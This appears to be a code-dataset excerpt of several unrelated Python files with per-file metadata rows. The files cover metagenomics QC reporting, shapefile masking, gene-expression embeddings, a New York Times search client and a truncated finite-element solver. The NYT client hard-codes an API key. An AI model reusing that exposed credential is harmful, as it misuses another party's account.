table_message=visualizations.show_table_max_rows(document, dna_orphan_data, dna_samples,
dna_orphan_columns, "DNA Orphan reads", files.ShotGunVis.path("qc_counts_orphan"),
format_data_comma=True)
#' <%= table_message %>
#' <% if pdf_format: print("\clearpage") %>
#+ echo=False
# plot the microbial reads ratios
dna_microbial_reads, dna_microbial_labels = utilities.microbial_read_proportion_multiple_databases(
dna_paired_data, dna_paired_columns, dna_orphan_data)
document.write_table(["# Sample"]+dna_microbial_labels, dna_samples,
dna_microbial_reads, files.ShotGunVis.path("microbial_counts",document.data_folder))
table_message=visualizations.show_table_max_rows(document, dna_microbial_reads, dna_samples,
dna_microbial_labels, "DNA microbial read proportion",
files.ShotGunVis.path("microbial_counts"))
#' <%= visualizations.ShotGun.captions["microbial_ratios"] %>
#' <%= table_message %>
#' ### DNA Samples Plots of Filtered Reads
#+ echo=False
document.plot_grouped_barchart(numpy.transpose(dna_paired_data), row_labels=dna_paired_columns,
column_labels=dna_samples, title="DNA Paired end reads", ylabel="Read count (in millions)",
legend_title="Filter", yaxis_in_millions=True)
#+ echo=False
document.plot_grouped_barchart(numpy.transpose(dna_orphan_data), row_labels=dna_orphan_columns,
column_labels=dna_samples, title="DNA Orphan reads", ylabel="Read count (in millions)",
legend_title="Filter", yaxis_in_millions=True)
#' ## RNA Samples Quality Control
#' ### RNA Samples Tables of Filtered Reads
#+ echo=False
document.write_table(["# Sample"]+rna_paired_columns, rna_samples, rna_paired_data,
files.ShotGunVis.path("rna_qc_counts_paired",document.data_folder))
table_message=visualizations.show_table_max_rows(document, rna_paired_data, rna_samples,
rna_paired_columns, "RNA Paired end reads", files.ShotGunVis.path("rna_qc_counts_paired"),
format_data_comma=True)
#' <%= table_message %>
#+ echo=False
document.write_table(["# Sample"]+rna_orphan_columns, rna_samples, rna_orphan_data,
files.ShotGunVis.path("rna_qc_counts_orphan",document.data_folder))
table_message=visualizations.show_table_max_rows(document, rna_orphan_data, rna_samples,
rna_orphan_columns, "RNA Orphan reads", files.ShotGunVis.path("rna_qc_counts_orphan"),
format_data_comma=True)
#' <%= table_message %>
#' <% if pdf_format: print("\clearpage") %>
#+ echo=False
# write and plot the microbial reads ratios
rna_microbial_reads, rna_microbial_labels = utilities.microbial_read_proportion_multiple_databases(
rna_paired_data, rna_paired_columns, rna_orphan_data)
document.write_table(["# Sample"]+rna_microbial_labels, rna_samples,
rna_microbial_reads, files.ShotGunVis.path("rna_microbial_counts",document.data_folder))
table_message=visualizations.show_table_max_rows(document, rna_microbial_reads, rna_samples,
rna_microbial_labels, "RNA microbial read proportion",
files.ShotGunVis.path("rna_microbial_counts"))
#' <%= visualizations.ShotGun.captions["microbial_ratios"] %>
#' <%= table_message %>
#' ### RNA Samples Plots of Filtered Reads
#+ echo=False
document.plot_grouped_barchart(numpy.transpose(rna_paired_data), row_labels=rna_paired_columns,
column_labels=rna_samples, title="RNA Paired end reads", ylabel="Read count (in millions)",
legend_title="Filter", yaxis_in_millions=True)
#+ echo=False
document.plot_grouped_barchart(numpy.transpose(rna_orphan_data), row_labels=rna_orphan_columns,
column_labels=rna_samples, title="RNA Orphan reads", ylabel="Read count (in millions)",
legend_title="Filter", yaxis_in_millions=True)
| 38.330882 | 156 | 0.782851 | 698 | 5,213 | 5.485673 | 0.121777 | 0.036563 | 0.059546 | 0.037608 | 0.761557 | 0.710629 | 0.558893 | 0.489423 | 0.430922 | 0.390703 | 0 | 0.000428 | 0.103012 | 5,213 | 135 | 157 | 38.614815 | 0.818435 | 0.206407 | 0 | 0.148148 | 0 | 0 | 0.153111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.055556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
49665a0b0e4dd98e4c598bd1960650361ca30dc7 | 1,604 | py | Python | Other_notebooks/Shapefile_Demo.py | gamedaygeorge/datacube-applications-library | 1b6314ee3465f9f17930391a4c241e981a9e200e | [
"Apache-2.0"
] | null | null | null | Other_notebooks/Shapefile_Demo.py | gamedaygeorge/datacube-applications-library | 1b6314ee3465f9f17930391a4c241e981a9e200e | [
"Apache-2.0"
] | null | null | null | Other_notebooks/Shapefile_Demo.py | gamedaygeorge/datacube-applications-library | 1b6314ee3465f9f17930391a4c241e981a9e200e | [
"Apache-2.0"
] | 1 | 2021-02-25T14:19:05.000Z | 2021-02-25T14:19:05.000Z | # Code behind module for Shapefile_Demo.ipynb
################################
##
## Import Statments
##
################################
# Import standard Python modules
import sys
import datacube
import numpy as np
import fiona
import xarray as xr
from rasterio.features import geometry_mask
import shapely
from shapely.ops import transform
from shapely.geometry import shape
from functools import partial
import pyproj
################################
##
## Function Definitions
##
################################
def shapefile_mask(dataset: xr.Dataset, shapefile) -> np.array:
"""Extracts a mask from a shapefile using dataset latitude and longitude extents.
Args:
dataset (xarray.Dataset): The dataset with the latitude and longitude extents.
shapefile (string): The shapefile to be used for extraction.
Returns:
A boolean mask array.
"""
with fiona.open(shapefile, 'r') as source:
collection = list(source)
geometries = []
for feature in collection:
geom = shape(feature['geometry'])
project = partial(
pyproj.transform,
pyproj.Proj(init=source.crs['init']), # source crs
pyproj.Proj(init='epsg:4326')) # destination crs
geom = transform(project, geom) # apply projection
geometries.append(geom)
geobox = dataset.geobox
mask = geometry_mask(
geometries,
out_shape=geobox.shape,
transform=geobox.affine,
all_touched=True,
invert=True)
return mask | 28.642857 | 86 | 0.596633 | 168 | 1,604 | 5.660714 | 0.482143 | 0.025237 | 0.042061 | 0.056782 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003336 | 0.252494 | 1,604 | 56 | 87 | 28.642857 | 0.789825 | 0.266209 | 0 | 0 | 0 | 0 | 0.021934 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.354839 | 0 | 0.419355 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
4968c48330c18edd322258fb79f85333f213b40b | 2,306 | py | Python | process/1_embed_keep_ge.py | omarmaddouri/GCNCC_1 | ec858bbe8246e4af15f7b870ca0ccafdea93d627 | [
"MIT"
] | 4 | 2020-12-03T11:57:15.000Z | 2021-12-09T05:20:44.000Z | process/1_embed_keep_ge.py | alkaidone/GCNCC | 3270b4c2d48e0090a18a0ab1df3b9fd81627029d | [
"MIT"
] | 5 | 2020-01-28T23:14:40.000Z | 2021-08-25T15:55:23.000Z | process/1_embed_keep_ge.py | alkaidone/GCNCC | 3270b4c2d48e0090a18a0ab1df3b9fd81627029d | [
"MIT"
] | 3 | 2021-11-23T05:13:27.000Z | 2021-12-30T08:12:48.000Z | from __future__ import division
from __future__ import print_function
from pathlib import Path
import sys
project_path = Path(__file__).resolve().parents[1]
sys.path.append(str(project_path))
from keras.layers import Dense, Activation, Dropout
from keras.models import Model, Sequential
from keras.regularizers import l2
from keras.optimizers import Adam
import keras.backend as K
import numpy as np
import time
import tensorflow as tf
import os
from core.utils import *
from core.layers.graph_cnn_layer import GraphCNN
from sklearn.preprocessing import normalize
# Set random seed
seed = 123
np.random.seed(seed)
tf.random.set_seed(seed)
# Settings
flags = tf.compat.v1.flags
FLAGS = flags.FLAGS
flags.DEFINE_string('dataset', 'brc_microarray_usa', 'Dataset string.')
flags.DEFINE_string('embedding_method', 'ge', 'Name of the embedding method.')
#Check dataset availability
if not os.path.isdir("{}/data/parsed_input/{}".format(project_path, FLAGS.dataset)):
sys.exit("{} dataset is not available under data/parsed_input/".format(FLAGS.dataset))
if not os.path.isdir("{}/data/output/{}/embedding/{}".format(project_path, FLAGS.dataset, FLAGS.embedding_method)):
os.makedirs("{}/data/output/{}/embedding/{}".format(project_path, FLAGS.dataset, FLAGS.embedding_method))
print("--------------------------------------------")
print("--------------------------------------------")
print("Hyper-parameters:")
print("Dataset: {}".format(FLAGS.dataset))
print("Embedding method: {}".format(FLAGS.embedding_method))
print("--------------------------------------------")
print("--------------------------------------------")
# Prepare Data
X, A, Y = load_training_data(dataset=FLAGS.dataset)
Y_train, Y_val, Y_test, train_idx, val_idx, test_idx, train_mask = get_splits_for_learning(Y, dataset=FLAGS.dataset)
# Normalize gene expression
X = normalize(X, norm='l1') #for positive non-zero entries, it's equivalent to: X /= X.sum(1).reshape(-1, 1)
#Save the node emmbeddings
np.savetxt("{}/data/output/{}/embedding/{}/embeddings.txt".format(project_path, FLAGS.dataset, FLAGS.embedding_method), X, delimiter="\t")
print("Embeddings saved in /data/output/{}/embedding/{}/embeddings.txt".format(FLAGS.dataset, FLAGS.embedding_method)) | 38.433333 | 139 | 0.685603 | 299 | 2,306 | 5.133779 | 0.408027 | 0.070358 | 0.065147 | 0.057329 | 0.255375 | 0.189577 | 0.120521 | 0.120521 | 0.088599 | 0.088599 | 0 | 0.004885 | 0.112316 | 2,306 | 60 | 140 | 38.433333 | 0.744993 | 0.083695 | 0 | 0.097561 | 0 | 0 | 0.272594 | 0.169516 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.390244 | 0 | 0.390244 | 0.219512 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
49755e37e2029b777679857be7a2f1b70a206d0d | 2,700 | py | Python | omnithinker/api/nytimes.py | stuycs-softdev-fall-2013/proj2-pd6-04-omnithinker | 53bf397ce2f67e7d5c5689486ab75475e99b0eba | [
"MIT",
"BSD-3-Clause"
] | 1 | 2022-01-18T02:03:15.000Z | 2022-01-18T02:03:15.000Z | omnithinker/api/nytimes.py | stuycs-softdev-fall-2013/proj2-pd6-04-omnithinker | 53bf397ce2f67e7d5c5689486ab75475e99b0eba | [
"MIT",
"BSD-3-Clause"
] | null | null | null | omnithinker/api/nytimes.py | stuycs-softdev-fall-2013/proj2-pd6-04-omnithinker | 53bf397ce2f67e7d5c5689486ab75475e99b0eba | [
"MIT",
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
import json
from urllib import urlopen
# http://api.nytimes.com/svc/search/v2/articlesearch.json?fq=Obama&FACET_FIELD=day_of_week&BEGIN_DATE=19000101
# &API-KEY=5772CD9A42F195C96DA0E930A7182688:14:68439177
# The original link is above. What happens is because we don't specify an end date, the panda article, which was
# coincidentally published today, becomes the first article that we see and gives us keywords like zoo.
# If we add an end date before then, then we can filter it out.
def ReturnRelatedTopics(Topic):
NYT_API_URL = 'http://api.nytimes.com/svc/search/v2/articlesearch'
API_KEY = "5772CD9A42F195C96DA0E930A7182688:14:68439177"
FORMAT = "json"
FQ = str(Topic)
FACET_FIELD = "day_of_week"
BEGIN_DATE = str(19000101)
END_DATE = str(20131208)
url = ("%s.%s?fq=%s&FACET_FIELD=%s&BEGIN_DATE=%s&END_DATE=%s&API-KEY=%s") % (NYT_API_URL, FORMAT, FQ, FACET_FIELD, BEGIN_DATE, END_DATE, API_KEY)
response = urlopen(url)
Json_Data = json.loads(response.read())
RELTOPICS = list()
for y in Json_Data["response"]["docs"]:
for x in y:
if x == "keywords":
for a in y[x]:
RELTOPICS.append(a["value"])
RELTOPICS.pop(0)
RELTOPICS.pop(0)
RELTOPICS.pop(0)
return RELTOPICS
class Nytimes():
def __init__(self, Topic):
NYT_API_URL = 'http://api.nytimes.com/svc/search/v2/articlesearch'
API_KEY = "5772CD9A42F195C96DA0E930A7182688:14:68439177"
FORMAT = "json"
FQ = str(Topic)
FACET_FIELD = "day_of_week"
BEGIN_DATE = str(19000101)
END_DATE = str(20131208)
url = ("%s.%s?fq=%s&FACET_FIELD=%s&BEGIN_DATE=%s&END_DATE=%s&API-KEY=%s") % (NYT_API_URL, FORMAT, FQ, FACET_FIELD, BEGIN_DATE, END_DATE, API_KEY)
response = urlopen(url)
self.Json_Data = json.loads(response.read())
URL = list()
TITLE = list()
SNIPPET = list()
Counter = 0
for x in self.Json_Data["response"]["docs"]:
#print x
URL.append(x["web_url"])
TITLE.append(x["headline"]["main"])
SNIPPET.append(x["snippet"])
#print(URL)
#print(TITLE)
#print(SNIPPET)
self.Data = zip(URL, TITLE, SNIPPET)
self.counter = 0
#print(Data)
def getArticle(self):
try:
self.counter += 1
return self.Data[self.counter - 1]
except:
return list()
#End of class
if __name__ == '__main__':
#FindArticles("Obama")
print ReturnRelatedTopics("airplane")
| 35.526316 | 153 | 0.605185 | 352 | 2,700 | 4.485795 | 0.321023 | 0.035465 | 0.022799 | 0.032299 | 0.504117 | 0.473718 | 0.412286 | 0.394554 | 0.368588 | 0.368588 | 0 | 0.07575 | 0.271481 | 2,700 | 75 | 154 | 36 | 0.726995 | 0.20037 | 0 | 0.396226 | 0 | 0.037736 | 0.197111 | 0.09972 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.037736 | null | null | 0.018868 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4978db654876ffc9e3f0801f73bab29baba94038 | 29,541 | py | Python | isitek.py | will-bainbridge/ISITEK | 53e90e0511bbd7cd08614b943c1286c56adbee5e | [
"MIT"
] | 3 | 2018-06-26T15:04:46.000Z | 2019-09-14T09:23:44.000Z | isitek.py | will-bainbridge/ISITEK | 53e90e0511bbd7cd08614b943c1286c56adbee5e | [
"MIT"
] | null | null | null | isitek.py | will-bainbridge/ISITEK | 53e90e0511bbd7cd08614b943c1286c56adbee5e | [
"MIT"
] | 3 | 2016-11-28T12:19:37.000Z | 2020-02-04T00:18:56.000Z | #!/usr/bin/python
################################################################################
import numpy
import os
import cPickle as pickle
import scipy.misc
import scipy.sparse
import scipy.sparse.linalg
import scipy.special
import sys
import time
class Struct:
def __init__(self, **keywords):
self.__dict__.update(keywords)
class Timer(object):
def __init__(self, name=None, multiline=False):
self.name = name
self.multiline = multiline
def __enter__(self):
self.start = time.time()
if self.name:
print '%s ...' % self.name ,
if self.multiline:
print
sys.stdout.flush()
def __exit__(self, type, value, traceback):
if self.multiline:
print ' ...' ,
print 'done in %.3f s' % (time.time() - self.start)
################################################################################
def nodegrid(a,b):
return [ x.T for x in numpy.meshgrid(a,b) ]
def dot_sequence(*args):
if len(args) == 1: return args[0]
else: return numpy.dot( args[0] , dot_sequence(*args[1:]) )
def string_multiple_replace(string,dict):
for s,r in dict.iteritems():
string = string.replace(s,r)
return string
################################################################################
def read_data_file(data_filename):
file = open(data_filename,'rb')
data = pickle.load(file)
file.close()
node = data['node']
face = data['face']
element = data['element']
boundary = data['boundary']
u = data['u']
order = data['order']
return node,face,element,boundary,u,order
#------------------------------------------------------------------------------#
def read_input_file(input_filename):
geometry_filename = []
order = []
boundary = []
initial = []
term = []
wind = []
iterations = []
mesh_size = []
constant = []
file = open(input_filename,'r')
for line in file.readlines():
lineparts = line.split()
if len(lineparts) >= 2 and lineparts[0] == 'geometry_filename':
geometry_filename = lineparts[1]
if len(lineparts) >= 2 and lineparts[0] == 'order':
order = numpy.array([ int(x) for x in lineparts[1:] ])
if len(lineparts) >= 4 and lineparts[0] == 'boundary':
boundary.append(Struct(
face = sum([ list(z) if len(z) == 1 else range(*z) for z in [ tuple( int(y) for y in x.split(':') ) for x in lineparts[1].split(',') ] ],[]) ,
variable = int(lineparts[2]) ,
condition = tuple(sum([ x == y for x in lineparts[3] ]) for y in 'nt') ,
value = float(lineparts[4]) if len(lineparts) >= 5 else 0.0 ))
if len(lineparts) >= 2 and lineparts[0] == 'initial':
initial = lineparts[1:]
if len(lineparts) >= 2 and lineparts[0] == 'constant':
constant = lineparts[1]
if len(lineparts) >= 6 and lineparts[0] == 'term':
term.append(Struct(
equation = int(lineparts[1]) ,
variable = [ int(x) for x in lineparts[2].split(',') ] ,
direction = lineparts[3] ,
differential = [ tuple( sum([ x == y for x in z ]) for y in 'xy' ) for z in lineparts[4].split(',') ] ,
power = [ int(x) for x in lineparts[5].split(',') ] ,
constant = lineparts[6] ,
method = lineparts[7] ))
if len(lineparts) >= 2 and lineparts[0] == 'wind':
wind = eval( 'lambda n,u,v:' + lineparts[1] , {'numpy':numpy} , {} )
if len(lineparts) >= 2 and lineparts[0] == 'iterations':
iterations = int(lineparts[1])
if len(lineparts) >= 2 and lineparts[0] == 'mesh_size':
mesh_size = int(lineparts[1])
file.close()
if len(constant):
constant = dict([ (y[0],float(y[1])) for y in [ x.split('=') for x in constant.split(';') ] ])
else:
constant = {}
if len(term):
for i in range(0,len(term)):
term[i].constant = eval(term[i].constant,{},constant)
if len(initial):
replace = {'pi':'numpy.pi','cos(':'numpy.cos(','sin(':'numpy.sin('}
for i in range(0,len(initial)):
initial[i] = eval( 'lambda x,y: numpy.ones(x.shape)*(' + string_multiple_replace(initial[i],replace) + ')' , {'numpy':numpy} , constant )
return geometry_filename,order,boundary,initial,term,wind,iterations,mesh_size
#------------------------------------------------------------------------------#
def element_sequential_indices(e,element,face):
n = len(element[e].face)
polyline = numpy.array([ list(face[f].node) for f in element[e].face ])
polynode = numpy.unique(polyline)
ones = numpy.ones((n,1))
connect = 1*(ones*polyline[:,0] == (ones*polynode).T) + 2*(ones*polyline[:,1] == (ones*polynode).T)
side = [0]*n
vertex = [0]*n
for i in range(1,n):
temp = connect[connect[:,side[i-1]] == (int(not vertex[i-1])+1),:].flatten() * (numpy.arange(0,n) != side[i-1])
side[i] = temp.nonzero()[0][0]
vertex[i] = temp[side[i]]-1
return [side,vertex]
#------------------------------------------------------------------------------#
def read_geometry(geometry_filename):
# read the geometry file
file = open(geometry_filename,'r')
data = file.readlines()
file.close()
# generate the mesh structures
i = 0
while i < len(data):
if data[i].strip().split()[0] == 'NODES':
nn = int(data[i].strip().split()[1])
node = [ Struct(x=(0.0,0.0)) for _ in range(0,nn) ]
for n in range(0,nn):
node[n].x = tuple( [ float(x) for x in data[i+1+n].strip().split() ] )
i += nn
elif data[i].strip().split()[0] == 'FACES':
nf = int(data[i].strip().split()[1])
face = [ Struct(node=(0,0),border=[],size=1.0,normal=(0.0,0.0),centre=(0.0,0.0),boundary=[],Q=[]) for temp in range(0,nf) ]
for f in range(0,nf):
face[f].node = tuple( [ int(x) for x in data[i+1+f].strip().split() ] )
i += nf
elif data[i].strip().split()[0] == 'CELLS' or data[i].strip().split()[0] == 'ELEMENTS':
ne = int(data[i].strip().split()[1])
element = [ Struct(face=[],orientation=[],size=1.0,area=0.0,centre=(0.0,0.0),unknown=[],V=[],P=[],Q=[],W=[],X=[]) for temp in range(0,ne) ]
for e in range(0,ne):
element[e].face = [ int(x) for x in data[i+1+e].strip().split() ]
i += ne
else:
i += 1
# generate borders
for e in range(0,ne):
for f in element[e].face:
face[f].border.append(e)
# additional element geometry
for e in range(0,ne):
s,t = element_sequential_indices(e,element,face)
index = [ face[element[e].face[i]].node[j] for i,j in zip(s,t) ]
cross = [ node[index[i-1]].x[0]*node[index[i]].x[1]-node[index[i]].x[0]*node[index[i-1]].x[1] for i in range(0,len(element[e].face)) ]
element[e].area = 0.5*sum(cross)
element[e].centre = tuple([ sum([ (node[index[i-1]].x[j]+node[index[i]].x[j])*cross[i] for i in range(0,len(element[e].face)) ])/(6*element[e].area) for j in range(0,2) ])
element[e].orientation = [ 2*t[i]-1 for i in s ]
if element[e].area < 0.0:
element[e].area = -element[e].area
element[e].orientation = [ -x for x in element[e].orientation ]
element[e].size = numpy.sqrt(element[e].area)
# additional face geometry
for f in range(0,nf):
face[f].normal = ( -node[face[f].node[1]].x[1]+node[face[f].node[0]].x[1] , +node[face[f].node[1]].x[0]-node[face[f].node[0]].x[0] )
face[f].size = 0.5*numpy.sqrt(numpy.dot(face[f].normal,face[f].normal))
face[f].centre = tuple([ 0.5*(node[face[f].node[1]].x[i]+node[face[f].node[0]].x[i]) for i in range(0,2) ])
# return
return node,face,element
#------------------------------------------------------------------------------#
def assign_boundaries():
nv = len(order)
for f in range(0,len(face)):
face[f].boundary = [ [] for v in range(0,nv) ]
for b in range(0,len(boundary)):
for f in boundary[b].face:
face[f].boundary[boundary[b].variable].append(b)
#------------------------------------------------------------------------------#
def generate_unknowns():
nv = len(order)
np = order*(order+1)/2
nu = 0
# number by element then variable
# > gives a more diagonally dominant system
for e in range(0,len(element)):
element[e].unknown = [ [] for v in range(0,nv) ]
for v in range(0,nv):
element[e].unknown[v] = range(nu,nu+np[v])
nu += np[v]
## number by variable then element
## > gives a system with visible blocks corresponding to equations
#for e in range(0,len(element)): element[e].unknown = [ [] for v in range(0,nv) ]
#for v in range(0,nv):
# for e in range(0,len(element)):
# element[e].unknown[v] = range(nu,nu+np[v])
# nu += np[v]
return numpy.zeros(nu)
#------------------------------------------------------------------------------#
def generate_constants(order):
max_order = max(order)
ng = 2*max_order-1
gauss_locations,gauss_weights = [ x.real for x in scipy.special.orthogonal.p_roots(ng) ]
#nh = 7
#hammer_locations = numpy.array([
# [0.101286507323456,0.101286507323456],[0.797426958353087,0.101286507323456],[0.101286507323456,0.797426958353087],
# [0.470142064105115,0.470142064105115],[0.059715871789770,0.470142064105115],[0.470142064105115,0.059715871789770],
# [0.333333333333333,0.333333333333333]])
#hammer_weights = 0.5 * numpy.array([
# 0.125939180544827,0.125939180544827,0.125939180544827,0.132394152788506,0.132394152788506,0.132394152788506,
# 0.225000000000000])
#nh = 9
#hammer_locations = numpy.array([
# [0.437525248383384,0.437525248383384],[0.124949503233232,0.437525248383384],[0.437525248383384,0.124949503233232],
# [0.165409927389841,0.037477420750088],[0.037477420750088,0.165409927389841],[0.797112651860071,0.165409927389841],
# [0.165409927389841,0.797112651860071],[0.037477420750088,0.797112651860071],[0.797112651860071,0.037477420750088]])
#hammer_weights = 0.5 * numpy.array([
# 0.205950504760887,0.205950504760887,0.205950504760887,0.063691414286223,0.063691414286223,0.063691414286223,
# 0.063691414286223,0.063691414286223,0.063691414286223])
nh = 12
hammer_locations = numpy.array([
[0.063089014491502,0.063089014491502],[0.873821971016996,0.063089014491502],[0.063089014491502,0.873821971016996],
[0.249286745170910,0.249286745170910],[0.501426509658179,0.249286745170910],[0.249286745170910,0.501426509658179],
[0.310352451033785,0.053145049844816],[0.053145049844816,0.310352451033785],[0.636502499121399,0.310352451033785],
[0.310352451033785,0.636502499121399],[0.053145049844816,0.636502499121399],[0.636502499121399,0.053145049844816]])
hammer_weights = 0.5 * numpy.array([
0.050844906370207,0.050844906370207,0.050844906370207,0.116786275726379,0.116786275726379,0.116786275726379,
0.082851075618374,0.082851075618374,0.082851075618374,0.082851075618374,0.082851075618374,0.082851075618374])
taylor_coefficients = numpy.array([])
taylor_powers = numpy.zeros((0,2),dtype=int)
for i in range(0,2*max_order):
taylor_coefficients = numpy.append(taylor_coefficients,scipy.misc.comb(i*numpy.ones(i+1),numpy.arange(0,i+1))/scipy.misc.factorial(i))
taylor_powers = numpy.append(taylor_powers,numpy.array([range(i,-1,-1),range(0,i+1)],dtype=int).T,axis=0)
powers_taylor = numpy.zeros((2*max_order,2*max_order),dtype=int)
for i in range(0,taylor_powers.shape[0]): powers_taylor[taylor_powers[i][0]][taylor_powers[i][1]] = i
factorial = scipy.misc.factorial(numpy.arange(0,2*max_order))
return gauss_locations,gauss_weights,hammer_locations,hammer_weights,taylor_coefficients,taylor_powers,powers_taylor,factorial
#------------------------------------------------------------------------------#
def basis(x,y,element,n,differential):
if taylor_powers[n,0] < differential[0] or taylor_powers[n,1] < differential[1]:
return numpy.zeros(x.shape)
p = taylor_powers[n]
q = taylor_powers[n]-differential
constant = taylor_coefficients[n] / numpy.power( element.size , sum(p) )
constant = constant * factorial[p[0]] * factorial[p[1]] / ( factorial[q[0]] * factorial[q[1]] )
return constant * numpy.power(x-element.centre[0],q[0]) * numpy.power(y-element.centre[1],q[1])
#------------------------------------------------------------------------------#
def derivative_transform_matrix(A,order):
n = order*(order+1)/2
D = numpy.zeros((n,n))
D[0,0] = 1.0
for i in range(0,order-1):
old = numpy.nonzero(numpy.sum(taylor_powers,axis=1) == i)[0]
temp = numpy.append( taylor_powers[old,:] + [1,0] , taylor_powers[old[taylor_powers[old,0] == 0],:] + [0,1] , axis=0 )
new = powers_taylor[temp[:,0],temp[:,1]]
index = nodegrid(old,old)
D[nodegrid(new,new)] = numpy.append(
A[0,0] * numpy.append( D[index] , numpy.zeros((i+1,1)) , axis=1 ) +
A[0,1] * numpy.append( numpy.zeros((i+1,1)) , D[index] , axis=1 ) ,
A[1,0] * numpy.append( D[old[-1],[old]] , [[0]] , axis=1 ) +
A[1,1] * numpy.append( [[0]] , D[old[-1],[old]] , axis=1 ) , axis=0 )
return D
#------------------------------------------------------------------------------#
def calculate_element_matrices():
nf = len(face)
ne = len(element)
nv = len(order)
max_order = max(order)
np = numpy.array([ len(x) for x in element[0].unknown ])
max_np = max(np)
ng = len(gauss_weights)
nh = len(hammer_weights)
# initialise
if do.pre:
for e in range(0,ne):
element[e].V = numpy.zeros((max_np,max_np))
element[e].P = numpy.zeros((max_np,(len(element[e].face)-2)*nh,max_np))
element[e].Q = [ numpy.zeros((ng,max_np)) for i in range(0,len(element[e].face)) ]
element[e].W = numpy.zeros((len(element[e].face)-2)*nh)
element[e].X = numpy.zeros(((len(element[e].face)-2)*nh,2))
for f in range(0,nf):
face[f].Q = [ [] for v in range(0,nv) ]
# element vandermonde matrices
if do.pre:
for e in range(0,ne):
for i in range(0,max_np):
for j in range(0,max_np):
element[e].V[i,j] = basis(numpy.array(element[e].centre[0]),numpy.array(element[e].centre[1]),element[e],i,taylor_powers[j])
# triangulation and element area quadrature
for e in range(0,ne):
# triangulate
nt = len(element[e].face)-2
v = numpy.zeros((nt,3),dtype=int)
v[:,0] = face[element[e].face[0]].node[0]
j = 0
for i in range(0,len(element[e].face)):
f = element[e].face[i]
o = int(element[e].orientation[i] < 0)
v[j][1:] = numpy.array(face[f].node)[[1-o,o]]
j += not any(v[j][1:] == v[j][0])
if j >= nt: break
# integration locations in and area of the triangles
element[e].X = numpy.zeros(((len(element[e].face)-2)*nh,2))
area = numpy.zeros(nt)
for i in range(0,nt):
d = numpy.array([ [ node[v[i][j]].x[k] - node[v[i][0]].x[k] for k in range(0,2) ] for j in range(1,3) ])
element[e].X[i*nh:(i+1)*nh] = ( numpy.ones((nh,1))*node[v[i][0]].x +
hammer_locations[:,0][numpy.newaxis].T*d[0] +
hammer_locations[:,1][numpy.newaxis].T*d[1] )
area[i] = numpy.cross(d[0,:],d[1,:])
# integration weights
element[e].W = (numpy.array([area]).T*hammer_weights).flatten()
# element FEM numerics matrices
if do.pre:
for e in range(0,ne):
# basis function values at the integration points
for i in range(0,max_np):
for j in range(0,max_np):
element[e].P[i][:,j] = basis(element[e].X[:,0],element[e].X[:,1],element[e],j,taylor_powers[i])
# element DG-FEM numerics matrices
if do.pre:
for e in range(0,ne):
for i in range(0,len(element[e].face)):
f = element[e].face[i]
# integration locations along the face
temp = gauss_locations[numpy.newaxis].T
x = 0.5*(1.0-temp)*node[face[f].node[0]].x + 0.5*(1.0+temp)*node[face[f].node[1]].x
# basis function values at the integration points
for j in range(0,max_np):
element[e].Q[i][:,j] = basis(x[:,0],x[:,1],element[e],j,[0,0])
# face IDG-FEM numerics matrices
for f in range(0,nf):
# adjacent element and boundaries
a = numpy.array(face[f].border)
na = len(a)
b = numpy.array(face[f].boundary,dtype=object)
nb = [ len(i) for i in b ]
if do.pre or (do.re and any(b)):
# rotation to face coordinates
R = numpy.array([[-face[f].normal[0],-face[f].normal[1]],[face[f].normal[1],-face[f].normal[0]]])
R /= numpy.sqrt(numpy.dot(face[f].normal,face[f].normal))
# face locations
x = 0.5*(1.0-gauss_locations[numpy.newaxis].T)*node[face[f].node[0]].x + 0.5*(1.0+gauss_locations[numpy.newaxis].T)*node[face[f].node[1]].x
y = face[f].centre + numpy.dot( x - face[f].centre , R.T )
w = gauss_weights
# adjacent integration locations
xa = [ element[a[i]].X for i in range(0,na) ]
ya = [ face[f].centre + numpy.dot( xa[i] - face[f].centre , R.T ) for i in range(0,na) ]
wa = numpy.append(element[a[0]].W,element[a[1]].W) if na == 2 else element[a[0]].W
for v in range(0,nv):
# face basis indices
temp = nodegrid(range(0,2*order[v]),range(0,2*order[v])) # NOTE # not sufficient for boundary faces with 2 bordering elements
face_taylor = powers_taylor[ numpy.logical_and( temp[0] + na*temp[1] < na*order[v] + nb[v] , temp[1] < order[v] ) ]
# number of interpolation unknowns
ni = len(face_taylor)
# matrices
P = numpy.zeros((na*nh,na*np[v]))
for j in range(0,np[v]):
for k in range(0,na):
P[k*nh:(1+k)*nh,j+k*np[v]] = basis(xa[k][:,0],xa[k][:,1],element[a[k]],j,[0,0])
Q = numpy.zeros((na*nh,ni))
for j in range(0,ni):
for k in range(0,na):
Q[k*nh:(k+1)*nh,j] = basis(ya[k][:,0],ya[k][:,1],face[f],face_taylor[j],[0,0])
A = dot_sequence( P.T , numpy.diag(wa) , Q )
B = dot_sequence( P.T , numpy.diag(wa) , P )
# boundary parts
